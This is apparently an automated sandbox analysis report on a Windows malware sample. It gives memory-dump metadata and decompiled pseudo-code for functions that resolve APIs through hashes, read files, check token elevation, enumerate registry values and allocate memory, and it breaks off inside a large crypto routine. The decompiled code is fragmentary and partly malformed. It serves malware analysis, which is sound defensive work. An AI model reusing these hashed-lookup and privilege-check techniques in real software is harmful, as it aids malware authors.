Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 04419c895331067b912bd824cbfd8fbb8c0d780d05d93b6029f80d7fcf77bde6
Instruction ID: 5ede1d56b88c4493ea4ed9985c9d073ec89c084656dbc97b730e869530025586
Opcode Fuzzy Hash: 04419c895331067b912bd824cbfd8fbb8c0d780d05d93b6029f80d7fcf77bde6
Instruction Fuzzy Hash: 51F0F430B8030BBFEB6017ED8C91F7F765DEB9364AF000C68B951664C5DF619414A231

Uniqueness

Uniqueness Score: -1.00%

Function 6E895B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E6E895B6D(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E892F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E88C328(_t23);
				if(E6E88C33C(_t23) != 0) {
					_t31[2] = E6E89352C(0);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E892F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E8935D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E6E892F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x6e895b6d
0x6e895b71
0x6e895b75
0x6e895b7e
0x6e895b84
0x6e895b85
0x6e895b77
0x6e895b79
0x6e895b79
0x6e895b9b
0x6e895baf
0x6e895b9d
0x6e895baa
0x6e895bac
0x6e895bac
0x6e895bb1
0x6e895bb6
0x6e895bc4
0x6e895c2f
0x6e895c32
0x00000000
0x6e895bc6
0x6e895bcb
0x6e895c18
0x6e895c1c
0x6e895c26
0x6e895c26
0x6e895c1c
0x6e895bcd
0x6e895bd9
0x6e895bde
0x6e895beb
0x6e895bf2
0x6e895bfe
0x6e895bff
0x6e895c06
0x6e895bf4
0x6e895bf4
0x6e895bf5
0x6e895bf6
0x6e895bf8
0x6e895bfa
0x6e895bfb
0x6e895bfb
0x6e895bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 6E895BAA

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction ID: c154bbd223b3271827d84279be137559d4f67e80725ed2cc00dc63fef26a5e08
Opcode Fuzzy Hash: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction Fuzzy Hash: 2FF0F430B80307BFEB6017ED8C91F7B765DEB92649F000C68B955660C6DF619814A231

Uniqueness

Uniqueness Score: -1.00%

Function 6E895D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E895D7C(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6E88C33C(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6E892F8C(0x4bcc7cba, 0xceed09cc) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6e895d80
0x6e895d81
0x6e895d83
0x6e895d89
0x6e895d8b
0x6e895d8f
0x6e895d8f
0x6e895d93
0x6e895d9f
0x6e895dd3
0x6e895dd3
0x00000000
0x6e895da1
0x6e895da6
0x6e895da7
0x6e895dbb
0x6e895dcc
0x6e895dbd
0x6e895dc8
0x6e895dc8
0x6e895dd1
0x6e895dd9
0x6e895ddb
0x6e895dde
0x6e895de3
0x6e895de3
0x6e895de7
0x6e895dec
0x00000000
0x00000000
0x00000000
0x6e895dd1

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,CEED09CC,?,?,00000000,00000000,?,6E895CB4,?,?), ref: 6E895DC8

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction ID: feb161a065ed558f5aa535b5daa854cc55203517733319b2563408b3498003f7
Opcode Fuzzy Hash: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction Fuzzy Hash: 3AF07831E19B122AD3925BBCEC44B8BB3E4EFD2320F200F3DF580A7084E720884492B0

Uniqueness

Uniqueness Score: -1.00%

Function 6E8910CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E8910CC(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6E892F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6E892F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0xd0443454
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6e8910da
0x6e8910dc
0x6e8910ea
0x6e8910ee
0x6e891137
0x00000000
0x6e891137
0x6e8910f3
0x6e8910f4
0x6e8910f6
0x6e8910fb
0x00000000
0x6e891114
0x6e891118
0x6e891125
0x6e891129
0x00000000
0x00000000
0x00000000
0x6e891132

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,D0443454,00000004,D0443458,D0443458,D0443458), ref: 6E891125

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction ID: 5f0e425047614d4319c004759f14342fffeb416cc6e96d4858bf7e9f87999a65
Opcode Fuzzy Hash: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction Fuzzy Hash: 81F049B4B082477BFB4495AC9C25F7B22AD6BC2614F51CC28B550DA188FB78CD4AA321

Uniqueness

Uniqueness Score: -1.00%

Function 6E8955B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8955B8(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6E892F8C(0xd0443458, 0x286b2253) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6E88E6E8(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6e8955c2
0x6e8955c4
0x6e8955cb
0x6e8955cd
0x6e8955d1
0x6e8955d3
0x6e8955d6
0x6e8955d9
0x6e8955d9
0x6e8955f3
0x00000000
0x00000000
0x6e895604
0x6e895608
0x00000000
0x00000000
0x6e895616
0x6e895619
0x6e89561e
0x6e895623
0x6e895623

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,D0443458,286B2253,?,?,D0443458,286B2253), ref: 6E895604

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction ID: 743cc55a1ac48af68fe24c25811103a19a5199b0f619ac37b22772ab0483f1d8
Opcode Fuzzy Hash: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction Fuzzy Hash: B2F0AFB560030A6FE7259F9EDC54CB7BBEDEBC1B14F00881DB4D543240DA30A8109AB0

Uniqueness

Uniqueness Score: -1.00%

Function 6E895DF0, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E895DF0(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6E88C33C(_t19) == 0) {
					_v12 = _a8;
					if(E6E892F8C(0x4bcc7cba, 0x2876e068) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6E89352C(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6e895df3
0x6e895df5
0x6e895e01
0x6e895e0b
0x6e895e21
0x6e895e40
0x6e895e23
0x6e895e34
0x6e895e38
0x6e895e58
0x6e895e3a
0x6e895e3a
0x6e895e3a
0x6e895e38
0x6e895e41
0x6e895e46
0x6e895e4f
0x6e895e48
0x6e895e48
0x6e895e4a
0x6e895e4a
0x6e895e03
0x6e895e03
0x6e895e03
0x6e895e55

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,4BCC7CBA,2876E068,?,?,?,6E895CE5,00000000,?,00000000,?), ref: 6E895E34

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction ID: f2d2428a9ab9aceb32aa7a74cba5fd26ab0873ffc350769148288203190e7db3
Opcode Fuzzy Hash: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction Fuzzy Hash: 3FF0A471A4CB07AFDB509FBDDC50AAF77D5AF45241F104C29B8A9D6140EB32D4049731

Uniqueness

Uniqueness Score: -1.00%

Function 6E893564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E6E893564(void* __ecx) {
				void* _t3;
				intOrPtr* _t8;
				void* _t12;

				_t12 = __ecx;
				if( *0x6e89d228 == 0xcd845700) {
					_t8 = E6E892F8C(0xa5eabdf8, 0xd926c223);
					 *0x6e89d22c = E6E892F8C(0xa5eabdf8, 0x9b42cb07);
					if( *0x6e89d228 == 0xcd845700) {
						 *_t8(2, 0, 0, 0, 0, 0); // executed
						 *0x6e89d228 = 0;
					}
				}
				_t3 = E6E892F8C(0xa5eabdf8, 0x80febacc);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t12);
					_push(8);
					_push( *0x6e89d228);
					asm("int3");
					return _t3;
				}
			}

0x6e89356c
0x6e893574
0x6e8935a7
0x6e8935b8
0x6e8935c3
0x6e8935ce
0x6e8935d0
0x6e8935d0
0x6e8935c3
0x6e893580
0x6e893587
0x6e893597
0x6e893589
0x6e893589
0x6e89358a
0x6e89358c
0x6e89358e
0x6e89358f
0x6e89358f

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,A5EABDF8,9B42CB07,A5EABDF8,D926C223,?,?,00000000,6E88DEB9,?,?), ref: 6E8935CE

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 9a6a1ca582ae7d5372b4964c6cd45dffeec4cd887e02bb5480ee92ddd127f9f8
Instruction ID: f24e8c4d021249a5a4e1dbd11765d79d2a4046d05381b4fddc47ee4f888051e3
Opcode Fuzzy Hash: 9a6a1ca582ae7d5372b4964c6cd45dffeec4cd887e02bb5480ee92ddd127f9f8
Instruction Fuzzy Hash: 33F08972A08112FED2541AFEBC08D56BADCEFC9616B908C28B659EB080D6144840E665

Uniqueness

Uniqueness Score: -1.00%

Function 00D51D89, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00D51EA8

Memory Dump Source

Source File: 00000002.00000002.492341023.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction ID: f948dcb8f5033ab914da6843e70033ea91ba27c5afae0f3f6314ee02198a3f21
Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction Fuzzy Hash: 2241D5B5E0521A8FDB04DF98C4916AEBBF1FF48714F19852EE848AB340D775A844CFA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E889144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E6E889144(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				char _v60;
				intOrPtr _v92;
				void* _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				signed int _v116;
				char _v128;
				intOrPtr _v132;
				void* _v136;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v156;
				char _v160;
				signed int _v164;
				char _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				char _v196;
				void* _v200;
				signed int _v204;
				char _v208;
				char _v212;
				char _v216;
				intOrPtr _v220;
				intOrPtr _v228;
				intOrPtr _v236;
				void* _v268;
				char _v292;
				char _v308;
				char _v316;
				char _v320;
				void* _v324;
				char _v332;
				char _v340;
				void* _v356;
				void* _v360;
				char _v364;
				char _v380;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				intOrPtr _v400;
				signed int _v404;
				char _v408;
				void* _v412;
				char _v416;
				signed int* _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				intOrPtr _v440;
				signed int* _v444;
				char _v448;
				void* _v452;
				intOrPtr _v460;
				char _v464;
				void* _v468;
				char _v472;
				intOrPtr _v476;
				char _v480;
				void* _v484;
				char _v492;
				char _v496;
				void* _v500;
				char _v508;
				char _v516;
				signed int _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _v548;
				char _v552;
				char _v556;
				char _v560;
				signed int _v564;
				signed int _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				signed int _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t437;
				intOrPtr _t442;
				signed int _t444;
				char* _t459;
				char _t534;
				signed int _t544;
				intOrPtr _t546;
				signed int _t550;
				signed int _t556;
				intOrPtr _t561;
				signed int _t567;
				char _t579;
				intOrPtr _t584;
				char _t585;
				intOrPtr _t589;
				char _t590;
				intOrPtr _t594;
				char _t595;
				intOrPtr _t599;
				char _t600;
				intOrPtr _t604;
				char _t605;
				intOrPtr _t609;
				signed int _t622;
				char _t629;
				intOrPtr _t633;
				signed char* _t635;
				signed int _t638;
				intOrPtr _t641;
				signed int* _t647;
				signed int* _t650;
				intOrPtr _t665;
				char* _t806;
				signed int* _t836;
				char* _t837;
				char* _t844;
				void* _t845;
				intOrPtr* _t854;
				signed int* _t856;
				intOrPtr* _t857;
				signed int* _t858;
				signed int* _t860;
				signed int* _t863;
				intOrPtr _t864;
				intOrPtr _t867;
				char _t868;
				signed int _t869;
				intOrPtr* _t872;
				intOrPtr* _t874;
				intOrPtr* _t875;
				intOrPtr* _t876;
				intOrPtr* _t877;
				intOrPtr* _t878;
				signed int* _t881;
				intOrPtr* _t882;
				char* _t907;
				void* _t935;
				char _t950;
				char _t951;
				intOrPtr* _t953;
				void* _t954;
				intOrPtr* _t955;
				void* _t957;

				_t957 = __eflags;
				_t953 =  &_v496;
				_t641 = __edx;
				_v40 = __ecx;
				_t951 =  *((intOrPtr*)(__ecx + 0xc));
				E6E892F8C(0x23627913, 0xae88daa3);
				_v496 = 0;
				E6E88F620( &_v492, 0);
				_v480 = 0;
				_v476 = 0;
				E6E88F620( &_v472, 0);
				_v528 = 0;
				E6E88F620( &_v524, 0);
				_v392 = 0x4145240a;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x90], xmm0");
				E6E88F8C4( &_v528, E6E88F568( &_v528) + 0x10);
				E6E88F558( &_v532, E6E88F568( &_v532) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v540 = _v540 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v536 + 0x88)) = 0x22dc1034;
				asm("movq [ecx+0x90], xmm0");
				E6E88F8C4( &_v536, E6E88F568( &_v536) + 0x10);
				E6E88F558( &_v540, E6E88F568( &_v540) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v548 = _v548 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v544 + 0x88)) = 0xc06fd820;
				asm("movq [ecx+0x90], xmm0");
				E6E88F8C4( &_v544, E6E88F568( &_v544) + 0x10);
				E6E88F558( &_v548, E6E88F568( &_v548) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v556 = _v556 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v552 + 0x88)) = 0xa54975b2;
				asm("movq [ecx+0x90], xmm0");
				E6E88F8C4( &_v552, E6E88F568( &_v552) + 0x10);
				E6E88F558( &_v556, E6E88F568( &_v556) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v564 = _v564 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v560 + 0x88)) = 0x271e028;
				asm("movq [ecx+0x90], xmm0");
				E6E88F8C4( &_v560, E6E88F568( &_v560) + 0x10);
				E6E88F558( &_v564, E6E88F568( &_v564) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v572 = _v572 + 1;
				asm("pxor xmm0, xmm0");
				( &_v568)[0x22] = 0xf279aa39;
				asm("movq [ecx+0x90], xmm0");
				E6E88F8C4( &_v568, E6E88F568( &_v568) + 0x10);
				E6E88F558( &_v572, E6E88F568( &_v572) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t953 =  *_t953 + 1;
				E6E89413C(0xa5eabdf8, _t953);
				E6E88F558( &_v576, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x4c], xmm0");
				E6E88F558( &_v580, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x54], xmm0");
				E6E88F558( &_v584, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x64], xmm0");
				E6E88F558( &_v588, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x6c], xmm0");
				E6E88F558( &_v592, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x74], xmm0");
				E6E88F558( &_v596, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x7c], xmm0");
				_v584 = _t951;
				E6E88ADB8( &_v584,  &_v172, _t957,  &_v192);
				_t889 = _v176;
				_t931 = _v172;
				if((_v176 | _v172) != 0) {
					E6E88B338( &_v308, _t951, __eflags, _t889, _t931);
					E6E88F8DC( &_v516, __eflags);
					_v520 = 0;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v516 + 0x88)) = 0x5889e652;
					asm("movq [eax+0x8], xmm0");
					E6E88F8C4( &_v516, E6E88F568( &_v516) + 0x10);
					E6E88F558( &_v520, E6E88F568( &_v520) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v528 = _v528 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v524 + 0x88)) = 0x1eeb5e35;
					asm("movq [eax+0x8], xmm0");
					E6E88F8C4( &_v524, E6E88F568( &_v524) + 0x10);
					E6E88F558( &_v528, E6E88F568( &_v528) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v536 = _v536 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v532 + 0x88)) = 0xac5d5303;
					asm("movq [eax+0x8], xmm0");
					E6E88F8C4( &_v532, E6E88F568( &_v532) + 0x10);
					E6E88F558( &_v536, E6E88F568( &_v536) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v544 = _v544 + 1;
					_t954 = _t953 + 0xfffffff4;
					asm("movq xmm0, [esp+0x1bc]");
					asm("movq [esp], xmm0");
					_v548 =  &_v544;
					E6E88BAB8( &_v340, __eflags);
					E6E88F558( &_v552, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x5c], xmm0");
					E6E88F558( &_v556, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x84], xmm0");
					_t935 = E6E88F558( &_v560, 0x20);
					_v164 =  *((intOrPtr*)(_t935 + 8));
					_v144 =  *((intOrPtr*)(_t935 + 0xc));
					E6E88F620( &_v396, 0);
					E6E88F620( &_v416, 0);
					_push(0);
					_push( *0x6e89b7c4);
					E6E8920A4(__eflags,  &_v100);
					E6E88F75C( &_v416, __eflags);
					E6E88E054( &_v100);
					E6E88F8C4( &_v436, E6E88F744( &_v420,  &_v100));
					_t437 = E6E88F558( &_v424, 0);
					E6E887970(_t951, _t437, E6E88F558( &_v444, 0), _v112);
					_t442 = E6E88F568( &_v448);
					_v228 = _t442;
					_t101 = _t442 + 2; // 0x2
					_v188 = E6E88B0A4( &_v584, 0x20000000, __eflags, _t101);
					_v236 = 0x20000000;
					_t444 = E6E88B0A4( &_v588, 0x80000000, __eflags, 0x82);
					_v184 = _t444;
					_v204 = 0x80000000;
					__eflags = _t444 | _v204;
					if((_t444 | _v204) == 0) {
						L51:
						E6E88F6F0( &_v380);
						E6E88F6F0( &_v364);
						E6E88F6F0( &_v332);
						goto L1;
					}
					__eflags = _v116 | _v164;
					if((_v116 | _v164) == 0) {
						goto L51;
					}
					E6E8935D4( &_v292, 0, 0x80);
					_t955 = _t954 + 0xc;
					 *((intOrPtr*)( &_v316 + 0x78)) = _v20;
					E6E88CDC0( &_v316, 0);
					_t459 =  &_v320;
					_t854 = _t459 + 0xe8;
					 *_t854 = _t641;
					 *((intOrPtr*)(_t854 - 4)) = _v20;
					_push(_t459);
					E6E88B48C(_t641, _t459 - 0x20, _t854 - 4, _v20, _t951, _t951, _t854 - 4);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esp+0x134], xmm1");
					_v236 = E6E88F568(_v20);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esi+0x8], xmm1");
					_v220 = E6E88F568(_t641);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [ebx-0x90], xmm1");
					E6E893C8C(_t951,  &_v60 - 0x80, __eflags, _v148, _v128, 7,  &_v60);
					_t133 =  &(( &_v564)[0x58]); // 0x160
					_t856 = _t133;
					 *_t856 = _v164;
					_t856[1] = ( &_v564)[0x69];
					E6E88F8DC( &_v564, __eflags);
					_v568 = 0;
					_t746 =  &_v564;
					asm("pxor xmm0, xmm0");
					_t136 = _t746 + 0x88; // 0x88
					 *_t136 = 0x853cdd04;
					asm("movq [eax+0x8], xmm0");
					E6E88F8C4( &_v564, E6E88F568( &_v564) + 0x10);
					E6E88F558( &_v568, E6E88F568( &_v568) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v576 = _v576 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v572 + 0x88)) = 0xb162dc4e;
					asm("movq [eax+0x8], xmm0");
					E6E88F8C4( &_v572, E6E88F568( &_v572) + 0x10);
					E6E88F558( &_v576, E6E88F568( &_v576) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v584 = _v584 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v580 + 0x88)) = 0xc15ccc53;
					asm("movq [eax+0x8], xmm0");
					E6E88F8C4( &_v580, E6E88F568( &_v580) + 0x10);
					E6E88F558( &_v584, E6E88F568( &_v584) + 0xfffffff0);
